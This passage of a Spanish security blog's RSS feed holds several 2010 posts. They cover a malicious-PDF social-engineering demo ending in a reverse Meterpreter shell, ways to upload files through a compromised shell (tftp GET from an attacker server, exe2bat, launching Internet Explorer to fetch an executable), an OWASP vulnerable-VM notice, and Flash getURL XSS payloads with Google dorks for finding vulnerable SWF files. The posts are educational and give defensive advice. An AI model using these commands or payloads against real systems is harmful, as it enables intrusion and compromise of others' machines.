&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Le indicamos el e-mail del destinatario, el remitente y la forma de envío del correo y se nos iniciará un listener que aguardará a que la víctima abra el PDF y por lo tanto, se conecte inversamente a nuestra máquina.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_cF66r39b8uc/S4rTPYclAeI/AAAAAAAAAGI/EkUZ0i3GHrI/s1600-h/Picture+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_cF66r39b8uc/S4rTPYclAeI/AAAAAAAAAGI/EkUZ0i3GHrI/s320/Picture+6.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Cuando el usuario finalmente abre el PDF, en éste caso, se le presenta una pantalla solicitándole la ejecución de un comando desde cmd. Dado que a nuestro usuario le interesa mucho el PDF, decide abrirlo ....... &amp;nbsp;(En este caso requerimos alta interacción del usuario, pero se podría haber mandado algún buffer overflow para Adobe que no hubiera lanzado mensaje alguno)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S4rYyZmDVsI/AAAAAAAAAGQ/5om5Ob_4hDc/s1600-h/Picture+12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S4rYyZmDVsI/AAAAAAAAAGQ/5om5Ob_4hDc/s320/Picture+12.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;En el atacante, podemos ver como de manera casi transparente al usuario, se ha obtenido una conexión inversa, habiendo inyectado una consola meterpreter.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;a href="http://2.bp.blogspot.com/_cF66r39b8uc/S4rY6BVZfnI/AAAAAAAAAGY/-VwAu2MDxJM/s1600-h/Picture+14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_cF66r39b8uc/S4rY6BVZfnI/AAAAAAAAAGY/-VwAu2MDxJM/s320/Picture+14.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Si abrimos la consola meterpreter mediante el comando &lt;i&gt;sessions -i 1&lt;/i&gt; podremos obtener finalmente acceso al sistema ....&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_cF66r39b8uc/S4ram8IH2YI/AAAAAAAAAGg/pOyXHEi2U1k/s1600-h/Picture+16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_cF66r39b8uc/S4ram8IH2YI/AAAAAAAAAGg/pOyXHEi2U1k/s320/Picture+16.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Para concluir, me gustaría reflexionar acerca de la prueba de concepto anterior. ¿Qué pasaría si en lugar de utilizar el puerto 31337, se hubiera utilizado el 80? ¿habríamos saltado las reglas de filtrado perimetral? ¿ Nos hubiera bloqueado algún proxy o algún sistema de inspección de contenidos? ¿ Cúantas empresas tienen este nivel de seguridad perimetral? No solo las empresas, sino los usuarios domésticos también pueden verse atacadas mediante similares técnicas para pasar a &amp;nbsp;formar parte de botnets.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Como se ha visto, &amp;nbsp;mediante técnicas que utilizan la ingeniería social es relativamente fácil obtener acceso a los usuarios de una organización, de modo que la &lt;b&gt;formación y concienciación de los usuarios debe formar parte del ciclo de securización de la información&lt;/b&gt;, siempre y cuando no queramos que la cadena se rompa por el eslabón más débil!&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Saludos,&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-728697649573150203?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/LbzUwxZtOTM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/LbzUwxZtOTM/sobre-ingenieria-social.html</link><author>noreply@blogger.com (Ramon Vicens)</author><media:thumbnail url="http://3.bp.blogspot.com/_cF66r39b8uc/S4rRGcaVCnI/AAAAAAAAAFg/prEwFzu3g0E/s72-c/Picture+1.png" height="72" width="72" /><feedburner:origLink>http://www.securecorner.net/2010/02/sobre-ingenieria-social.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-2093845399236510608</guid><pubDate>Thu, 18 Feb 2010 00:15:00 +0000</pubDate><atom:updated>2010-02-18T01:15:48.536+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>Transferir ficheros a través de una Bind/Reverse shell</title><description>&lt;div style="text-align: justify;"&gt;En uno de los posts anteriores, hablé de &lt;a href="http://www.securecorner.net/2010/02/escalando-privilegios-en-windows.html"&gt;escalar privilegios en windows&lt;/a&gt;, &amp;nbsp;mediante un exploit local (pre-compilado) una vez se ha obtenido pivilegios de usuario en el sistema con otro exploit remoto. Pero ¿cómo podemos subir el exploit local a la máquina objetivo?&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Existen varias formas para subir a un sistema los archivos que deseemos, pero entre otras me gustaría citar las siguientes:&lt;/div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;TFTP&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Shell Inline&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Mediante Internet Explorer&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;las explico a continuación...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;TFTP&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Las máquinas Microsoft Windows desde su versión NT hasta la versión XP&amp;nbsp;incorporan&amp;nbsp;un cliente &lt;a href="http://es.wikipedia.org/wiki/TFTP"&gt;TFTP&lt;/a&gt; en la carpeta del sistema C:\WINNT\System32&amp;gt;. De modo que una manera muy sencillar de transmitir ficheros desde una máquina atacante a una máquina comprometida es:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;ul&gt;&lt;li&gt;&lt;i&gt;Desde la shell remota:&lt;/i&gt;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;ul&gt;&lt;li&gt;tftp -i &lt;ip_servidor_tftp&gt; GET &lt;fichero_a_descargar&gt;&lt;/fichero_a_descargar&gt;&lt;/ip_servidor_tftp&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li&gt;&lt;ip_servidor_tftp&gt;Cambio de los permisos de lectura a escritura (TFTP usa copia por defecto en &lt;i&gt;solo lectura&lt;/i&gt;)&lt;/ip_servidor_tftp&gt;&lt;/li&gt;
&lt;ul&gt;&lt;li&gt;attrib -r &lt;nombre_del_fichero_descargado&gt;&lt;/nombre_del_fichero_descargado&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Las grandes ventajas de usar este método son la sencillez, rapidez y que el propio Windows (a no ser que el propio administrador lo haya prohibido por plantillas de seguridad o GPOs) incorpora dicho cliente.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;La principal desventaja es que todo buen administrador de red filtraría el puerto UDP / 69 que usa dicho cliente. De modo que ante un ataque externo no sería tan trivial realizar la transferencia.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Shell Inline&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Si ya tenemos una shell abierta, por qué no usarla para realizar una transferencia a través de la misma ventana ?&lt;br /&gt;
&lt;br /&gt;
El método consisten en:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Realizar un echo del código hexadecimal bytecode a un fichero de texto&lt;/li&gt;
&lt;ul&gt;&lt;li&gt;exe2bat.exe &lt;fichero_binario_a_transmirit&gt; &lt;fichero_texto_resultante&gt;&lt;/fichero_texto_resultante&gt;&lt;/fichero_binario_a_transmirit&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li&gt;Seguidamente hacer un "Copiar y Pegar" dentro de la misma shell, creando el fichero en la máquina víctima&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La herramienta exe2bat.exe genera un código hexadecimal que se compilará en la shell remota cuando dicho código se pegue en ella sin abrir ninguna otra conexión alternativa a la ya establecida por el exploit remoto.&lt;br /&gt;
&lt;br /&gt;
Frente a la ventaja de ser menos "ruidoso" en el sistema, tiene por contra un límite de 64 Kbytes de transferencia de datos.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Internet Explorer&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
Dado que en la actualidad Internet Explorer forma parte del sistema operativo, ¿por qué no aprovecharlo para realizar descargas?&lt;br /&gt;
&lt;br /&gt;
Por ejemplo, si en una máquina atacante inicializamos un servidor web que contenga el fichero calc.exe, podríamos desde la shell lanzar el siguiente comando:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;start iexplore http://&lt;ip_servidor_web&gt;/calc.exe&lt;/ip_servidor_web&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;Dado que es un ejecutable, Internet Explorer solicitará si se desea descargar o no el fichero, hecho que desde una consola podría ocasionar problemas. Pero ... habeis pensado... ¿qué pasaría si el fichero a descargar &lt;i&gt;no fuera exactamente un .exe&lt;/i&gt;? En caso de descargarse, ¿Dónde se guardaría?&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Es importante conocer la existencia de éstas maneras de transmisión de ficheros para saber cómo podemos securizar los sistemas de modo que las medidas que debería tomar un administrador de redes y sistemas son, además de implantar mecanismos de detección y prevención, aplicar mecanismos de protección como:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Buena política&lt;/b&gt; de filtrado en el entorno de red perimetral&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Buena política&lt;/b&gt; de&amp;nbsp;filtrado en el entorno host/servidor&lt;/li&gt;
&lt;li&gt;No permitir la ejecución de determinados binarios del sistema. Restricción general de los permisos del equipo. En general, realizar un &lt;b&gt;buen&amp;nbsp;&lt;/b&gt;&lt;i&gt;&lt;a href="http://en.wikipedia.org/wiki/Hardening_(computing)"&gt;&lt;b&gt;hardening&lt;/b&gt;&lt;/a&gt;&lt;/i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;de los mismos&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Ojo con las navegaciones desde servidores públicos de la &lt;a href="http://en.wikipedia.org/wiki/DMZ_(computing)"&gt;DMZ&lt;/a&gt;, NUNCA SE DEBE PERMITIR LA NAVEGACIÓN DESDE UN SERVIDOR!!!&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;Saludos,&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-2093845399236510608?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/kF3oOSIz4y4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/kF3oOSIz4y4/transferir-ficheros-traves-de-una.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/transferir-ficheros-traves-de-una.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-4309493028060243848</guid><pubDate>Tue, 16 Feb 2010 00:02:00 +0000</pubDate><atom:updated>2010-02-16T01:02:04.558+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>OWASP Broken Web Applications Project</title><description>&lt;div style="text-align: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a href="http://code.google.com/p/owaspbwa/wiki/ProjectSummary"&gt;OWASP Broken Web Applications Project&lt;/a&gt; es una máquina virtual VMware que incluye diversas aplicaciones web con vulnerabilidades conocidas. Las aplicaciones que incluye dicha máquina son las siguientes:&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href="http://caballe.cat/wp/go.php?http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project"&gt;OWASP WebGoa&lt;/a&gt;t versión 5.3-SNAPSHOT&lt;/li&gt;
&lt;li&gt;&lt;a href="http://caballe.cat/wp/go.php?http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project"&gt;OWASP Vicnum&lt;/a&gt; versión 1.3&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10"&gt;Mutillidae&lt;/a&gt; versión 1.3&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.dvwa.co.uk/"&gt;Damm Vulnerable Web Application&lt;/a&gt; versión 1.06&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project"&gt;OWASP CSRFGuard&lt;/a&gt; Test Application versión 2.2&lt;/li&gt;
&lt;li&gt;Mandiant Struts Forms&lt;/li&gt;
&lt;li&gt;Formularios ASP.NET&lt;/li&gt;
&lt;li&gt;Formularios con DOM Cross Site Scripting&lt;/li&gt;
&lt;li&gt;&lt;a href="http://wordpress.org/"&gt;WordPress&lt;/a&gt;&amp;nbsp;2.0.0&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.phpbb.com/"&gt;phpBB&lt;/a&gt; 2.0.0&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.forumsoftware.ca/"&gt;Yazd&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;Al parecer todavía no están documentadas todas las vulnerabilidades de las aplicaciones de la máquina virtual. Por ello, se mantiene abierto un &lt;a href="http://code.google.com/p/owaspbwa/issues/list"&gt;wiki en Google Code&lt;/a&gt; para disponer de un listado completo de las mismas.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
La máquina se puede descargar desde &lt;a href="http://code.google.com/p/owaspbwa/wiki/Downloads"&gt;Aquí&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', Georgia, 'BitStream Vera Sans', 'DejaVu LGC Serif', Constantia, 'Liberation Sans', Times, 'Times New Roman', serif;"&gt;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: Times;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Muy buen recursos para perder un par de horas practicando ....&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, Georgia, 'BitStream Vera Sans', 'DejaVu LGC Serif', Constantia, 'Liberation Sans', Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, Georgia, 'BitStream Vera Sans', 'DejaVu LGC Serif', Constantia, 'Liberation Sans', Times, 'Times New Roman', serif;"&gt;Saludos,&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-4309493028060243848?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/hPohXobFIXM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/hPohXobFIXM/owasp-broken-web-applications-project.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/02/owasp-broken-web-applications-project.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-5193549353909631033</guid><pubDate>Wed, 10 Feb 2010 07:00:00 +0000</pubDate><atom:updated>2010-02-10T08:00:02.951+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>Cross Site Scripting en ficheros Flash</title><description>&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande';"&gt;Uno de los artículos que me ha sorprendido recientemente ha sido "&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Trebuchet MS', 'Lucida Grande', Verdana, Arial, sans-serif; font-weight: bold;"&gt;&lt;a href="http://websecurity.com.ua/3789/"&gt;XSS vulnerabilities in 8 millions flash files&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black; font-family: 'Lucida Grande'; font-weight: normal;"&gt;" encontrado a traves de Pentester.es.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;Como es de suponer, el título captó mi atención... ¿¿¿8 millones ??? El autor en su post, nos enseña cómo encontrar archivos flash a través de las búsquedas avanzadas de google y con ello, obtener archivos potencialmente vulnerables a través de una inyección de javascript.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;El concepto es muy sencillo, todos aquellos flash, en general publicitarios que cuentan el número de&lt;i&gt; clicks &lt;/i&gt;que se han realizado sobre ellos, que dispongan de un link a otra URL, muchas veces pueden tener implementada la función geturl() que si no se parsean debidamente los parámetros de entrada, nos permitiría ejecutar códigos javascript. Veamos....&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;Suponemos un flash que dentro de su código tenemos lo siguiente:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; if (j == 3 &amp;amp;&amp;amp; Number(realVersion[j]) == Number(version[j])) {&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; setSessionFlash();&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; getURL(url, '');&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; break;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; }&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;o bien ...&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp;button 17 {&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;on (release) {&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;getURL(clickTag, '');&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;}&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;Como vemos, en ambos ejemplos, getURL se ejecuta directamente a partir del parámetro (url o clickTag) que le vamos a proporcionar a través de la URL del navegador....... ufffff esto huele!!&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;Si un usuario con mala idea cambia el valor de nuestro parámetro del siguiente modo, se ejecutará el código.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;url=javascript:alert('Soy Vulnerable')&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;clickTag=avascript:alert('Soy Vulnerable')&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;Para los curiosos, podreis encontrar los ficheros flash vulnerables mediante búsquedas en google. La que mejor resultados me ha producido a mi han sido las siguientes:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;filetype:swf inurl:url=http&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;filetype:swf inurl:clickTAG=http&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;De éste modo, evitamos falsos positivos del tipo http://blabalabala/url/blalala/flash.swf y sumando todos aquellos que no realizan llamada a getURL o bien ésta está debidamente parseada, obtendríamos algunos menos resultados de los 8 millones que el autor remarcaba... aunque, no deja de ser sorprendente la cantidad de resultados.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;Saludos,&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande', 'Lucida Grande', Verdana, Arial, sans-serif;"&gt;&lt;br /&gt;
